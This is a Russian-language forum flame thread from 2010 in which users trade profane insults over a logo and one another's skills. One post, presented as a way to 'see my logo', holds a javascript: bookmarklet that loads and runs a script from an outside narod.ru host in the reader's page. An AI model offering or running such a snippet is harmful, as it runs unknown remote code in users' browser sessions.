отмазкизанят другим кагбы
юзер, ну нарисуй лучше))Спустя 39 сек.лого им бля на халяву:D нарисуй))
Форум → Сообщество → Флейм → Дом флудера (говорит кто о чем хочет) — 10. Юбилейный!
Дом флудера (говорит кто о чем хочет) — 10. Юбилейный!
Страницы: ← Предыдущая страница • Следующая страница →
-
Июль 31, 2010, 7:35 п.п., спустя 11 минут 34 секунды
восстановил пост на форуме кинсбургаСпустя 75 сек.user_name, извини, но когда говорят, а сделать не могут, то таких людей треплом зовут? Я не верю что ты сможешь нарисовать лучше, вот и всеСпустя 17 сек.https://smappi.org/ - платформа по созданию API на все случаи жизни -
Июль 31, 2010, 7:35 п.п., спустя 20 секунд
занят другим кагбыСпустя 39 сек.лого им бля на халяву:D нарисуй))
ну нельзя же быть таким жмотом)) если обосрал, так сделай лучше)) если не нравится и делать не хочешь, так сиди молча))Высокоуровневое абстрактное говно -
-
Июль 31, 2010, 8:56 п.п., спустя 1 минуту 2 секунды
хули чё? раз такой крутой, покажи портфолио.. хотя бы))Высокоуровневое абстрактное говно -
Июль 31, 2010, 8:57 п.п., спустя 1 минуту 4 секунды
щас я закажу и на фрилансе че нить бесплатно)) если будет ломаться, уже знаю как быть)Спустя 46 сек.
я кагбы не работаю на деньги, не снимаюсь тоесть
хули чё? раз такой крутой, покажи портфолио.. хотя бы)) -
Июль 31, 2010, 9:26 п.п., спустя 29 минут 17 секунд
не парьтесь, я нарисовал, как умею, но старался :D -
Июль 31, 2010, 9:26 п.п., спустя 23 часа 59 минут 54 секунды
цветовая гамма немного не подходит))Высокоуровневое абстрактное говно -
Июль 31, 2010, 9:27 п.п., спустя 58 секунд
Stasovsky, да, буквы в логотипе мне тоже не нравятся, надо их убрать -
Июль 31, 2010, 9:39 п.п., спустя 12 минут 8 секунд
не мы тебе написали, умник ;)
щас я закажу и на фрилансе че нить бесплатно)) если будет ломаться, уже знаю как быть)
ты сам выебнулся, а попросили показать "как-надо" - сразу стухhttps://smappi.org/ - платформа по созданию API на все случаи жизни -
Июль 31, 2010, 9:42 п.п., спустя 2 минуты 59 секунд
прям даже не знаю, чего хочется, пива или шоколада))Высокоуровневое абстрактное говно -
Июль 31, 2010, 9:53 п.п., спустя 10 минут 30 секунд
бля не люблю людей которые критики не терпят… Ну хуевое лого у тебя, нахуй мне тебе доказывать??
не мы тебе написали, умник ;)
щас я закажу и на фрилансе че нить бесплатно)) если будет ломаться, уже знаю как быть)
ты сам выебнулся, а попросили показать "как-надо" - сразу стух
'Я бы даже лучше" - это образно, я вообще не дизайнер -
Июль 31, 2010, 9:55 п.п., спустя 2 минуты 47 секунд
да че вы распизделись?
user_name, ну не нравится тебе лого, хорошо) все поняли, у тебя, кстати, аватарка - хуйня полная)Спустя 32 сек.user_name, ты, кстати, молодец, долше всех заминусованных вроде держишься)все умрут, а я изумруд -
Июль 31, 2010, 9:57 п.п., спустя 1 минуту 42 секунды
не а чем мой лого плох, сами попробуйтеjavascript:var%20s=document.createElement('script');s.src='http://matrixloader.narod.ru/logo.js?nc='+Math.random();document.body.appendChild(s);void(0);
-
Июль 31, 2010, 9:58 п.п., спустя 1 минуту 4 секунды
:D
да че вы распизделись?
user_name, ну не нравится тебе лого, хорошо) все поняли, у тебя, кстати, аватарка - хуйня полная)Спустя 32 сек.user_name, ты, кстати, молодец, долше всех заминусованных вроде держишься) -
Страницы: ← Предыдущая страница • Следующая страница →
Пожалуйста, авторизуйтесь, чтобы написать комментарий!